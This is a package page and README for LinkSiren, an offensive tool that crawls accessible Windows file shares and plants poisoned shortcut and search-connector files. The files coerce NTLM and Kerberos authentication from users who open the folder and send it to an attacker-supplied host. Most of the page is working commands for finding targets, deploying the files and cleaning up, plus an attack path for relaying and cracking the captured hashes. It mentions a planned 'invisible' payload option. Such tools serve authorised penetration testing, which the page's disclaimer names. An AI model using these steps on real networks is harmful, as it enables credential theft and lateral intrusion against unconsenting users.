Generation, targeted deployment, and scalable cleanup for files that coerce Windows authentication.
Project description
Description
The Siren waits thee, singing song for song. - Walter Savage Landor
LinkSiren distributes .library-ms, .searchConnector-ms, .url, and .lnk files to accessible file shares to coerce NetNTLM and Kerberos authentication over SMB and HTTP from hosts that open them. It's like Farmer, Lnkbomb, or Slinky but it identifies the best place to put the files for coercion and has scalable deployment and cleanup built in.
Installation
Using pipx (Recommended)
# Install pipx if necessary
python3 -m pip install pipx
pipx ensurepath
# Install linksiren
pipx install linksiren
Alternatively, install from source
# Download source code
git clone https://github.com/gjhami/LinkSiren.git
cd LinkSiren
# Optional: Set up a virtual environment and install requirements
python -m venv .venv
source ./.venv/bin/activate # Linux
# .\.venv\Scripts\activate # Windows
# Install requirements
python -m pip install -r requirements.txt
How do I use this NOW?
# Install using pipx
pipx install linksiren
# Identify optimal locations for poisoned file deployment
linksiren identify --targets <shares file> [domain]/username[:password]
# Deploy to identified locations
linksiren deploy --targets folder_targets.txt --attacker <attacker IP> [domain]/username[:password]
# Capture hashes / relay authentication
# Cleanup poisoned files
linksiren cleanup --targets payloads_written.txt [domain]/username[:password]
How do I use this the ~right~ way?
# Install using pipx
pipx install linksiren
# 1. Create a targets file containing accessible shares, one per line, in the following format: \\server.domain.tld\share
# I recommend crackmapexec or shareenum, make sure you can delete files you deploy
# 2. Use LinkSiren to identify the most active folders on them
# Note: You may fine tune the --max-depth, --active-threshold, --fast, and --max-folders-per-share params as necessary
# Note: Specify '.' as the domain to log in using a local user account
linksiren identify --targets <shares file> [domain]/username[:password]
# 3. Use LinkSiren to deploy payloads to all of the active folders
# --identify saves UNC paths to active folders in folder_targets.txt
linksiren deploy --targets folder_targets.txt --attacker <attacker IP> [domain]/username[:password]
# 4. Let the hashes come to you and relay them as you see fit :)
# Use CrackMapExec and LdapRelayScan for relay target identification
# Use LdapRelayScan to determine if you can relay HTTP auth to LDAP
# Use Impacket's ntlmrelayx for relay with pcredz for hash capture on the attacker machine
# You could also use KrbJack to relay kerberos auth to a machine whose DNS record you've hijacked
# 5. Cleanup the payload files when you're finished gathering.
# Set targets to a file containing UNC paths of all folders where payloads were written
# --deploy saves UNC paths to deployed payloads in payload_folders.txt
# Note: If you set a custom payload name (--payload) when deploying, you must set the same name here
linksiren cleanup --targets payloads_written.txt [domain]/username[:password]
What is the Attack Path?
- (Optional) Get Intranet-Zoned if you want to coerce HTTP authentication. See the note in theHackerRecipes WebClient Abuse.
- Create a list of UNC paths to writeable SMB shares.
- Note: Make sure you can delete files in them for cleanup.
- [Optional] Run LinkSiren in
generate
mode to write templates locally - [Optional] Run LinkSiren in
rank
mode to output rankings for accessible folders based on recent access. - Run LinkSiren in
identify
mode to find the best places to put poisoned files. - Start a listener or relay on your attacker machine to capture and/or relay coerced authentication to services without Signing/Channel Binding like LDAP, MSSQL, SMB, AD CS (HTTP), and others.
- Run LinkSiren in
deploy
mode to place payloads in the optimal locations identified. - Let the hashes roll in. Relay and/or crack as desired.
- Run LinkSiren in
cleanup
mode to delete all the poisoned files.
Modes
LinkSiren offers the following modes of operation:
Generate
Create poisoned files to use for coercion and store them locally.
Usage
linksiren generate --help
usage: linksiren generate [-h] -a ATTACKER [-n PAYLOAD]
options:
-h, --help show this help message and exit
-n PAYLOAD, --payload PAYLOAD
(Default: @Test_Do_Not_Remove.searchConnector-ms) Name of payload file ending in .library-ms, .searchConnector-ms, .lnk, or .url
Required Arguments:
-a ATTACKER, --attacker ATTACKER
Attacker IP or hostname to place in malicious URL
Rank
Given a list of accessible shares, output ranks for the folders within them based on the liklihood placing a file in the folder will coerce authentication from a user.
Usage
linksiren rank --help
usage: linksiren rank [-h] -t TARGETS [-md MAX_DEPTH] [-at ACTIVE_THRESHOLD] [-f] credentials
options:
-h, --help show this help message and exit
-md MAX_DEPTH, --max-depth MAX_DEPTH
(Default: 3) The maximum depth of folders to search within the target.
-at ACTIVE_THRESHOLD, --active-threshold ACTIVE_THRESHOLD
(Default: 2) Number of days as an integer for active files.
-f, --fast (Default: False) Mark folders active as soon as one active file in them is identified and move on. Ranks are all set to 1 assigned.
Required Arguments:
credentials [domain/]username[:password] for authentication
-t TARGETS, --targets TARGETS
Path to a text file containing UNC paths to file shares / base directories within which to rank folders as potential locations for
placing poisoned files.
Identify
Given a list of accessible shares and customizable constraints, including a maximum number of target folders per share, output UNC paths to the optimal folders for placing poisoned files.
Usage
linksiren identify --help
usage: linksiren identify [-h] -t TARGETS [-md MAX_DEPTH] [-at ACTIVE_THRESHOLD] [-f] [-mf MAX_FOLDERS_PER_TARGET] credentials
options:
-h, --help show this help message and exit
-md MAX_DEPTH, --max-depth MAX_DEPTH
(Default: 3) The maximum depth of folders to search within the target
-at ACTIVE_THRESHOLD, --active-threshold ACTIVE_THRESHOLD
(Default: 2) Max number of days since within which a file is considered active.
-f, --fast (Default: False) Mark folders active as soon as one active file in them is identified and move on. Ranks are all set to 1.
-mf MAX_FOLDERS_PER_TARGET, --max-folders-per-target MAX_FOLDERS_PER_TARGET
(Default: 10) Maximum number of folders to output as deployment targets per supplied target share or folder.
Required Arguments:
credentials [domain/]username[:password] for authentication
-t TARGETS, --targets TARGETS
Path to a text file containing UNC paths to file shares / base directories for deployment or from which to remove payload files
Deploy
Generate poisoned files for coercion and deploy them to specified UNC paths. Typically the specified UNC paths are the output of identify
mode. Output a list of UNC paths to folders where payloads were successfully deployed for cleanup.
Usage
linksiren deploy --help
usage: linksiren deploy [-h] -t TARGETS -a ATTACKER [-n PAYLOAD] credentials
options:
-h, --help show this help message and exit
-n PAYLOAD, --payload PAYLOAD
(Default: @Test_Do_Not_Remove.searchConnector-ms) Name of payload file ending in .library-ms, .searchConnector-ms, .lnk, or .url
Required Arguments:
credentials [domain/]username[:password] for authentication
-t TARGETS, --targets TARGETS
Path to a text file containing UNC paths to folders into which poisoned files will be deployed.
-a ATTACKER, --attacker ATTACKER
Attacker IP or hostname to place in poisoned files.
Cleanup
Remove all payloads from the specified UNC paths, typically the output of deploy
mode.
Usage
linksiren cleanup --help
usage: linksiren cleanup [-h] -t TARGETS [-n PAYLOAD] credentials
options:
-h, --help show this help message and exit
-n PAYLOAD, --payload PAYLOAD
(Default: @Test_Do_Not_Remove.searchConnector-ms) Name of payload file ending in .library-ms, .searchConnector-ms, .lnk, or .url
Required Arguments:
credentials [domain/]username[:password] for authentication
-t TARGETS, --targets TARGETS
Path to a text file containing UNC paths to folders in which poisoned files are located.
What Payload Type Should I Use?
Search Connectors (.searchConnector-ms): This is generally the best option. They require the least amount of interaction, start the WebClient service from a stopped state automatically when the parent folder is opened in Explorer, and are capable of coercing both SMB and HTTP authentication using a single file.
How is this better than the other tools?
Summary
- Scales to an arbitrary number of malicious .searchConnector-ms, .library-ms, .url, or .lnk files
- Targeted malicious file placement
- Single command deployment and cleanup
- Cross platform with python
As in real estate, the three most important things when attempting to coerce auth using files: location, location, location. All techniques identified here only coerce authentication from users that open the folder containing the poisoned file.
Other tools are built to place a single malicious .searchConnector-ms, .library-ms, or .url file at a specified location and clean up that one malicious file. If you find yourself with access to a lot of shares you may want things to scale and you may not be in the mood to write a wrapper. Additionally, you may not know the best place to put a poisoned file in a sea of accessible shares.
LinkSiren crawls shares you currently have access to and ranks every subfolder based on the liklihood it will be opened by a user sometime soon. Then it uses this information to target malicious file distribution to multiple locations at once. Additionally, LinkSiren records the full UNC path of malicious file it creates, allowing for cleanup with a single command.
How will you make it even better?
I'm looking to add the following features:
- Multithreading/Multiprocessing for faster share crawling
- Add a progress bar for share crawling
- Add a safe mode that checks if a file can be deleted from a target share before deploying it.
- Add an option for 'invisible' targets for .Library-ms and .searchConnector-ms files where the icon is set to blank and the name is set to a non-printing, valid ASCII character.
- Test for anonymous access to shares
- Add an instructions sections that details how to get intranet zoned (Blog Post In Progress)
- Add an explanation of how this can be used with ntlmrelayx (Blog Post In Progress)
- Enable authentication using a NTLM hash
- Enable ticket based authnentication (Kerberos)
- Use a logging package (loguru) to vary output verbosity and log additional actions.
- Log all crawl, deployment, and cleanup actions as well as success / failure indicators with timestamps for posterity.
- Maintain a file that has payloads that still exist because errors (other than STATUS_OBJECT_NAME_NOT_FOUND) prevented payload deletion.
- Add pydantic validation for arguments including targets and output file names.
- Add compatibility with proxied SMB relay connections created using impacket's ntlmrelayx.
- The attack would need to be added to smbattack.py and would need to accept only an authenticated SMB connection.
Note
This tools is designed for ethical hacking and penetration testing. It should be used exclusively on networks where explicit, written permission has been granted for testing. I accept no responsibility for the safety or effectiveness of this tool. Please don't sue me.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Hashes for linksiren-0.0.3-py3-none-any.whl
Algorithm | Hash digest | |
---|---|---|
SHA256 | e076fcdd9fec7ef7a37f6cc085a055f9cb5bd71fd695277b4a8ec5bb3452fb2f |
|
MD5 | ce7af39ee31dcef7fff92bb834985239 |
|
BLAKE2b-256 | 8c32229a939deef7a21b96823c37bf397e6cc334e2d5d65b00e5c5e1cc9364f2 |